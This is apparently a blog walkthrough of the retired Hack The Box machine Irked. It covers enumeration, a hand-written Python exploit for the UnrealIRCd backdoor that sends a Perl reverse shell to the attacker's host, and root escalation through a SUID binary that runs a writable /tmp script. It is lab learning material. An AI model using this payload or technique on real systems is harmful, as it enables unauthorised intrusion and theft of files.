Those Are The Guys!

Two guys who do stuff on twitch: /thosearetheguys

View on GitHub
28 April 2019

Htb Irked

by jake

This week we are taking a look at the retired Hack The Box machine Irked (Easy difficulty)

Run nmap

root@kali: nmap -sC -sV -oN nmap 10.10.10.117
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 16:37 AEDT
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey: 
|   1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA)
|   2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA)
|   256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA)
|_  256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519)
80/tcp  open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Site doesn't have a title (text/html).
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2,3,4        111/tcp  rpcbind
|   100000  2,3,4        111/udp  rpcbind
|   100024  1          54516/tcp  status
|_  100024  1          59966/udp  status
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.11 seconds

Looks like something called RPCBind is listening, lets do some research: https://linux.die.net/man/8/rpcbind

Looks like it’s a service that manages handing out ports to RPC based applications on a server. for example if I have an app that needs to listen, it tells RPC bind, which assigns a port, and can tell requesting clients what port to listen on. Nothing interesting on the main 111 port, but maybe there’s something on one of the bound RPC ports:

root@kali: nmap -sV -p 54516 10.10.10.117                                                           
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 16:46 AEDT
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).

PORT      STATE SERVICE VERSION
54516/tcp open  status  1 (RPC #100024)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds

and the UDP one:

kali :: ~/CTFs/irked # nmap -sUV -p 59966 10.10.10.117                                           
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 16:47 AEDT
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).

PORT      STATE SERVICE VERSION
59966/udp open  status  1 (RPC #100024)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.75 seconds

Nothing obvious there, lets look at the site on port 80: 224428115.png

Not much of anything in the source: 224493664.png

We have a plain website so we need to do some enumeration to see if there is anything else hidden, so we run gobuster:

root@kali: gobuster -u http://10.10.10.117/ -k -x txt,php,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 150 -o gobuster.log 

=====================================================
Gobuster v2.0.0              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.117/
[+] Threads      : 150
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : html,txt,php
[+] Timeout      : 10s
=====================================================
2018/12/31 16:49:28 Starting gobuster
=====================================================
/index.html (Status: 200)
/manual (Status: 301)
Progress: 168405 / 882244 (19.09%)

Nothing on the website either, maybe there’s some other ports:

root@kali: nmap -p- --max-retries 1 -Pn -T4 --oN nmap-allports 10.10.10.117
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).
Scanned at 2018-12-31 17:03:56 AEDT for 156s
Not shown: 65528 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
6697/tcp  open  ircs-u
8067/tcp  open  infi-async
54516/tcp open  unknown
65534/tcp open  unknown

Now that we have some ports let’s double check 6697 and 8067 with a more detailed scan:

root@kali: nmap -sC -sV -p 8067,6697 10.10.10.117                             
Starting Nmap 7.70 ( https://nmap.org ) at 2018-12-31 17:07 AEDT
Nmap scan report for 10.10.10.117
Host is up (0.23s latency).

PORT     STATE SERVICE VERSION
6697/tcp open  irc     UnrealIRCd
8067/tcp open  irc     UnrealIRCd
Service Info: Host: irked.htb

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.66 seconds

Searching the service name for any known exploits we get some good results:

root@kali: searchsploit unrealirc                                                    
--------------------------------------------------------- ----------------------------------------
 Exploit Title                                           |  Path
                                                         | (/usr/share/exploitdb/)
--------------------------------------------------------- ----------------------------------------
UnrealIRCd 3.2.8.1 - Backdoor Command Execution (Metaspl | exploits/linux/remote/16922.rb
UnrealIRCd 3.2.8.1 - Local Configuration Stack Overflow  | exploits/windows/dos/18011.txt
UnrealIRCd 3.2.8.1 - Remote Downloader/Execute           | exploits/linux/remote/13853.pl
UnrealIRCd 3.x - Remote Denial of Service                | exploits/windows/dos/27407.pl
--------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

Looking through the exploits 13853 has a bunch of different payloads which look like they perform command execution, (probably the same as the metasploit module). Doing some research on the exploit it looks like it is a deliberate backdoor that allows command execution if the input starts with AB; 

We came here to learn so let’s take what we have learned from the existing exploits and see if we can write our own:

import socket

ip = "10.10.10.117"
port = 8067

payload = b'AB;perl -MIO -e \'$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"10.10.14.6:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};\';\n'

buf = 5000

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

sock.connect((ip, port))

sock.send(payload)
data = sock.recv(buf)
sock.close
print(data)

Basically this exploit connects to the server and port then sends the backdoor command with another command to give us a reverse shell.

In one terminal we set up a listener with nc -nlvp 8080 update the IP and port in the payload, and run the exploit python3 exploit.py

Eventually we will get a basic reverse shell we can update with python:

python -c "import pty; pty.spawn('/bin/bash')"

and we are on the box with an interactive shell. Time to enumerate.

ircd@irked:~/Unreal3.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:111::/var/run/dbus:/bin/false
avahi:x:105:112:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:114::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
geoclue:x:110:119::/var/lib/geoclue:/bin/false
pulse:x:111:121:PulseAudio daemon,,,:/var/run/pulse:/bin/false
speech-dispatcher:x:112:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
sshd:x:113:65534::/var/run/sshd:/usr/sbin/nologin
rtkit:x:114:123:RealtimeKit,,,:/proc:/bin/false
saned:x:115:124::/var/lib/saned:/bin/false
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
hplip:x:117:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:118:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
djmardov:x:1000:1000:djmardov,,,:/home/djmardov:/bin/bash
ircd:x:1001:1001::/home/ircd:/bin/sh

Okay, so it looks like for user we need to become djmarov.

A bit of enumerating finds us:

ircd@irked:/home/djmardov$ ls -la
ls -la
total 92
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 .
drwxr-xr-x  4 root     root     4096 May 14  2018 ..
lrwxrwxrwx  1 root     root        9 Nov  3 04:26 .bash_history -> /dev/null
-rw-r--r--  1 djmardov djmardov  220 May 11  2018 .bash_logout
-rw-r--r--  1 djmardov djmardov 3515 May 11  2018 .bashrc
drwx------ 13 djmardov djmardov 4096 May 15  2018 .cache
drwx------ 15 djmardov djmardov 4096 May 15  2018 .config
drwx------  3 djmardov djmardov 4096 May 11  2018 .dbus
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Desktop
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 Documents
drwxr-xr-x  2 djmardov djmardov 4096 May 14  2018 Downloads
drwx------  3 djmardov djmardov 4096 Nov  3 04:40 .gconf
drwx------  2 djmardov djmardov 4096 May 15  2018 .gnupg
-rw-------  1 djmardov djmardov 4706 Nov  3 04:40 .ICEauthority
drwx------  3 djmardov djmardov 4096 May 11  2018 .local
drwx------  4 djmardov djmardov 4096 May 11  2018 .mozilla
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Music
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Pictures
-rw-r--r--  1 djmardov djmardov  675 May 11  2018 .profile
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Public
drwx------  2 djmardov djmardov 4096 May 11  2018 .ssh
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Templates
drwxr-xr-x  2 djmardov djmardov 4096 May 11  2018 Videos

bash history is out, as is .ssh, as we don’t have permission. Lets look in Documents

ircd@irked:/home/djmardov/Documents$ ls -la
ls -la
total 16
drwxr-xr-x  2 djmardov djmardov 4096 May 15  2018 .
drwxr-xr-x 18 djmardov djmardov 4096 Nov  3 04:40 ..
-rw-r--r--  1 djmardov djmardov   52 May 16  2018 .backup
-rw-------  1 djmardov djmardov   33 May 15  2018 user.txt

Hmn, we can’t read user.txt because we don’t have permissions, but we can read .backup so let’s do that

ircd@irked:/home/djmardov/Documents$ cat .backup
Super elite steg backup pw
U[redacted]s

Steg… I wonder if that refers to stenography. Okay, there’s been nothing else on the box, let’s look at that jpeg on the website, it seems a good candidate.

Using steghide (which didn’t come in my copy of Kali, but apt install steghide solved that) extract the info out of the image.

root@kali: steghide extract -sf index.jpeg                                           
Enter passphrase: 
wrote extracted data to "pass.txt".
root@kali: cat pass.txt                                                              
Kab...J:HG

Great! We have a password hidden by djmardov, what if it is his SSH password?

root@kali: ssh djmardov@10.10.10.117                                            255 ↵
djmardov@10.10.10.117's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue May 15 08:56:32 2018 from 10.33.3.3

Boom. User.

Get the user.txt flag and begin to enumerate, when we check for any SUID binaries we see something interesting:

djmardov@irked:~$ find / -perm -4000 2>/dev/null | xargs ls -la
-rwsr-xr-x 1 root   root         34208 Jan 21  2016 /bin/fusermount
-rwsr-xr-x 1 root   root         34684 Mar 29  2015 /bin/mount
-rwsr-xr-x 1 root   root        161584 Jan 28  2017 /bin/ntfs-3g
-rwsr-xr-x 1 root   root         38868 May 17  2017 /bin/su
-rwsr-xr-x 1 root   root         26344 Mar 29  2015 /bin/umount
-rwsr-xr-x 1 root   root         96760 Aug 13  2014 /sbin/mount.nfs
-rwsr-sr-x 1 root   root          9468 Apr  1  2014 /usr/bin/X
-rwsr-sr-x 1 daemon daemon       50644 Sep 30  2014 /usr/bin/at
-rwsr-xr-x 1 root   root         52344 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 root   root         43576 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 root   root         78072 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 root   root         38740 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 root   root         53112 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 root   root         18072 Sep  8  2016 /usr/bin/pkexec
-rwsr-sr-x 1 root   mail         96192 Nov 18  2017 /usr/bin/procmail
-rwsr-xr-x 1 root   root          7328 May 16  2018 /usr/bin/viewuser
-rwsr-xr-- 1 root   messagebus  362672 Nov 21  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root   root          9468 Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root   root        562536 Nov 19  2017 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root   root         13816 Sep  8  2016 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root   root         13564 Oct 14  2014 /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper
-rwsr-xr-x 1 root   root       1085300 Feb 10  2018 /usr/sbin/exim4
-rwsr-xr-- 1 root   dip         338948 Apr 14  2015 /usr/sbin/pppd

When we compare this output with our local linux device. See if there’s any differences.

Procmail and viewuser were our main differences. Let’s see what viewuser does:

djmardov@irked:~/Documents$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           Dec 31 05:23 (:0)
djmardov pts/1        Dec 31 05:57 (10.10.14.6)
sh: 1: /tmp/listusers: not found

interesting, what happens if we create a /tmp/listusers script?

ls -la /root > /tmp/rootdir

When we try running viewuser again we get an error:

djmardov@irked:~/Documents$ /usr/bin/viewuser
This application is being devleoped to set and test user permissions
It is still being actively developed
(unknown) :0           Dec 31 05:23 (:0)
djmardov pts/1        Dec 31 05:57 (10.10.14.6)
sh: 1: /tmp/listusers: Permission denied

Luckily this is easy to fix, we just need to give full control to the listusers file chmod 777 /tmp/listusers

This time when we run the script we get a rootdir file created with the contents of the /root directory:

djmardov@irked:~$ cat /tmp/test
total 28
drwx------  2 root root 4096 Nov  3 04:25 .
drwxr-xr-x 21 root root 4096 May 15  2018 ..
lrwxrwxrwx  1 root root    9 Nov  3 04:25 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-------  1 root root   12 Nov  3 04:43 .nano_history
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-r--r--  1 root root   17 May 14  2018 pass.txt
-rw-------  1 root root   33 May 15  2018 root.txt

No ssh keys, but there is a pass.txt. Next up we try to grab a copy of that and for good measure we can grab the root.txt as well:

cp /root/pass.txt /tmp/pass.txt
chmod 777 /tmp/pass.txt
cp /root/root.txt /tmp/root.txt
chmod 777 /tmp/root.txt

Turns out the pass.txt is the same as the one hidden in the image and is not the password for the root user, so we just grab the root.txt and call it a day.

tags: htb - walkthrough - Irked